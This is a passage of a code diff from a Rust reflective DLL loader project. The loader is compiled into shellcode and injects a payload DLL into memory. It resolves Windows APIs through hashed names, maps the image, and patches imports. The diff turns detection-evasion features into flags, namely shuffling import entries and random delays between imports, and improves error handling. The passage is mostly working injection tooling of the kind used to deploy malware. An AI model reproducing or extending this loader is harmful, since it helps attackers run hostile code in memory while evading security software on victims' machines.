+airborne-common = { path = "../common" }
 
 [dependencies.windows-sys]
 version = "0.52.0"

reflective_loader/src/lib.rs

@@ -10,6 +10,7 @@ use core::{
     slice::from_raw_parts,
 };
 
+use airborne_common::Flags;
 use windows_sys::{
     core::PWSTR,
     Win32::{
@@ -41,10 +42,6 @@ use windows_sys::{
 
 use crate::memory::*;
 
-// TODO: replace with parameters from the shellcode generator
-const SHUFFLE_IMPORTS: bool = true;
-const DELAY_IMPORTS: bool = true;
-
 const MAX_IMPORT_DELAY_MS: u64 = 2000;
 
 #[cfg(not(test))]
@@ -53,36 +50,15 @@ fn panic(_info: &core::panic::PanicInfo) -> ! {
     loop {}
 }
 
-// TODO: add to blog references
-// https://research.ijcaonline.org/volume113/number8/pxc3901710.pdf
-
-// TODO: check if i8 types can be replaced with u8 types (especially in pointers)
-
-// TODO: replace plain returns with Result<T, E> and propagate errors until panic in the loader function
-
-// TODO: remove _fltused and _DllMainCRTStartup (and uncomment DllMain) if deemed unnecessary after testing
-
-#[export_name = "_fltused"]
-static _FLTUSED: i32 = 0;
-
 #[no_mangle]
-#[allow(non_snake_case)]
+#[allow(non_snake_case, clippy::missing_safety_doc)]
-pub unsafe extern "system" fn _DllMainCRTStartup(
+pub unsafe extern "system" fn DllMain(_module: HMODULE, _reason: u32, _reserved: *mut u8) -> BOOL {
-    _module: HMODULE,
-    _call_reason: u32,
-    _reserved: *mut c_void,
-) -> BOOL {
     1
 }
 
-//#[no_mangle]
-//#[allow(non_snake_case)]
-//pub unsafe extern "system" fn DllMain(_module: HMODULE, _reason: u32, _reserved: *mut u8) -> BOOL {
-//    1
-//}
-
 #[link_section = ".text"]
 #[no_mangle]
+#[allow(clippy::missing_safety_doc)]
 pub unsafe extern "system" fn loader(
     payload_dll: *mut c_void,
     function_hash: u32,
@@ -91,6 +67,8 @@ pub unsafe extern "system" fn loader(
     _shellcode_bin: *mut c_void,
     flags: u32,
 ) {
+    let flags = airborne_common::parse_u32_flag(flags);
+
     /*
         1.) locate the required functions and modules from exports with their hashed names
     */
@@ -121,11 +99,8 @@ pub unsafe extern "system" fn loader(
         as *mut IMAGE_NT_HEADERS64;
     let module_img_size = (*module_nt_headers_ptr).OptionalHeader.SizeOfImage as usize;
     let preferred_base_ptr = (*module_nt_headers_ptr).OptionalHeader.ImageBase as *mut c_void;
-    let base_addr_ptr = allocate_rw_memory(preferred_base_ptr, module_img_size, &far_procs);
+    let base_addr_ptr =
-
+        allocate_rw_memory(preferred_base_ptr, module_img_size, &far_procs).unwrap();
-    if base_addr_ptr.is_null() {
-        return;
-    }
 
     copy_pe(base_addr_ptr, module_base_ptr, module_nt_headers_ptr);
 
@@ -163,7 +138,7 @@ pub unsafe extern "system" fn loader(
         return;
     }
 
-    patch_iat(base_addr_ptr, import_descriptor_ptr, &far_procs);
+    patch_iat(base_addr_ptr, import_descriptor_ptr, &far_procs, &flags);
 
     /*
         5.) finalize the sections by setting protective permissions after mapping the image
@@ -175,15 +150,7 @@ pub unsafe extern "system" fn loader(
         6.) execute DllMain or user defined function depending on the flag passed into the shellcode by the generator
     */
 
-    if flags == 0 {
+    if flags.ufn {
-        let dll_main_addr = base_addr_ptr as usize
-            + (*module_nt_headers_ptr).OptionalHeader.AddressOfEntryPoint as usize;
-
-        #[allow(non_snake_case)]
-        let DllMain = transmute::<_, DllMain>(dll_main_addr);
-
-        DllMain(base_addr_ptr as _, DLL_PROCESS_ATTACH, module_base_ptr as _);
-    } else {
         // UserFunction address = base address + RVA of user function
         let user_fn_addr = get_export_addr(base_addr_ptr as _, function_hash).unwrap();
 
@@ -192,6 +159,14 @@ pub unsafe extern "system" fn loader(
 
         // execution with user data passed into the shellcode by the generator
         UserFunction(user_data, user_data_len);
+    } else {
+        let dll_main_addr = base_addr_ptr as usize
+            + (*module_nt_headers_ptr).OptionalHeader.AddressOfEntryPoint as usize;
+
+        #[allow(non_snake_case)]
+        let DllMain = transmute::<_, DllMain>(dll_main_addr);
+
+        DllMain(base_addr_ptr as _, DLL_PROCESS_ATTACH, module_base_ptr as _);
     }
 }
 
@@ -263,7 +238,7 @@ unsafe fn get_module_ptr(module_hash: u32) -> Option<*mut u8> {
         let name_slice_buf = from_raw_parts(transmute::<PWSTR, *const u8>(name_buf_ptr), name_len);
 
         // calculate the module hash and compare it
-        if module_hash == airborne_utils::calc_hash(name_slice_buf) {
+        if module_hash == airborne_common::calc_hash(name_slice_buf) {
             return Some((*table_entry_ptr).DllBase as _);
         }
 
@@ -318,7 +293,7 @@ unsafe fn get_export_addr(module_base_ptr: *mut u8, function_hash: u32) -> Optio
         let name_len = get_cstr_len(name_ptr as _);
         let name_slice = from_raw_parts(name_ptr as _, name_len);
 
-        if function_hash == airborne_utils::calc_hash(name_slice) {
+        if function_hash == airborne_common::calc_hash(name_slice) {
             return Some(module_base_ptr as usize + funcs[ords[i as usize] as usize] as usize);
         }
     }
@@ -331,7 +306,7 @@ unsafe fn allocate_rw_memory(
     preferred_base_ptr: *mut c_void,
     alloc_size: usize,
     far_procs: &FarProcs,
-) -> *mut c_void {
+) -> Option<*mut c_void> {
     let mut base_addr_ptr = (far_procs.VirtualAlloc)(
         preferred_base_ptr,
         alloc_size,
@@ -349,7 +324,11 @@ unsafe fn allocate_rw_memory(
         );
     }
 
-    base_addr_ptr
+    if base_addr_ptr.is_null() {
+        return None;
+    }
+
+    Some(base_addr_ptr)
 }
 
 #[link_section = ".text"]
@@ -438,7 +417,8 @@ unsafe fn patch_iat(
     base_addr_ptr: *mut c_void,
     mut import_descriptor_ptr: *mut IMAGE_IMPORT_DESCRIPTOR,
     far_procs: &FarProcs,
-) {
+    flags: &Flags,
+) -> BOOL {
     /*
         1.) shuffle Import Directory Table entries (image import descriptors)
         2.) delay the relocation of each import a random duration
@@ -456,10 +436,13 @@ unsafe fn patch_iat(
 
     let id_ptr = import_descriptor_ptr;
 
-    if import_count > 1 && SHUFFLE_IMPORTS {
+    if import_count > 1 && flags.shuffle {
         // Fisher-Yates shuffle
         for i in 0..import_count - 1 {
-            let rn = get_rn(far_procs).unwrap(); // TODO: replace with error propagation
+            let rn = match get_random(far_procs) {
+                Some(rn) => rn,
+                None => return 0,
+            };
 
             let gap = import_count - i;
             let j_u64 = i + (rn % gap);
@@ -473,17 +456,18 @@ unsafe fn patch_iat(
         let module_name_ptr = rva::<i8>(base_addr_ptr as _, (*import_descriptor_ptr).Name as usize);
 
         if module_name_ptr.is_null() {
-            return;
+            return 0;
         }
 
         let module_handle = (far_procs.LoadLibraryA)(module_name_ptr as _);
 
         if module_handle == 0 {
-            return;
+            return 0;
         }
 
-        if DELAY_IMPORTS {
+        if flags.delay {
-            let rn = get_rn(far_procs).unwrap_or(0); // TODO: replace with error propagation
+            // skip delay if winapi call fails
+            let rn = get_random(far_procs).unwrap_or(0);
             let delay = rn % MAX_IMPORT_DELAY_MS;
             (far_procs.Sleep)(delay as _);
         }
@@ -517,7 +501,10 @@ unsafe fn patch_iat(
                 // mask out the high bits to get the ordinal value and patch the address of the function
                 let fn_ord_ptr = ((*original_thunk_ptr).u1.Ordinal & 0xFFFF) as *const u8;
                 (*thunk_ptr).u1.Function =
-                    (far_procs.GetProcAddress)(module_handle, fn_ord_ptr).unwrap() as _;
+                    match (far_procs.GetProcAddress)(module_handle, fn_ord_ptr) {
+                        Some(fn_addr) => fn_addr as usize as _,
+                        None => return 0,
+                    };
             } else {
                 // get the function name from the thunk and patch the address of the function
                 let thunk_data_ptr = (base_addr_ptr as usize
@@ -525,7 +512,10 @@ unsafe fn patch_iat(
                     as *mut IMAGE_IMPORT_BY_NAME;
                 let fn_name_ptr = (*thunk_data_ptr).Name.as_ptr();
                 (*thunk_ptr).u1.Function =
-                    (far_procs.GetProcAddress)(module_handle, fn_name_ptr).unwrap() as _;
+                    match (far_procs.GetProcAddress)(module_handle, fn_name_ptr) {
+                        Some(fn_addr) => fn_addr as usize as _,
+                        None => return 0,
+                    };
             }
 
             thunk_ptr = thunk_ptr.add(1);
@@ -535,6 +525,8 @@ unsafe fn patch_iat(
         import_descriptor_ptr =
             (import_descriptor_ptr as usize + size_of::<IMAGE_IMPORT_DESCRIPTOR>()) as _;
     }
+
+    1
 }
 
 #[link_section = ".text"]
@@ -609,7 +601,7 @@ unsafe fn finalize_relocations(
 }
 
 #[link_section = ".text"]
-unsafe fn get_rn(far_procs: &FarProcs) -> Option<u64> {
+unsafe fn get_random(far_procs: &FarProcs) -> Option<u64> {
     let mut buffer = [0u8; 8];
     let status = (far_procs.BCryptGenRandom)(
         BCRYPT_RNG_ALG_HANDLE,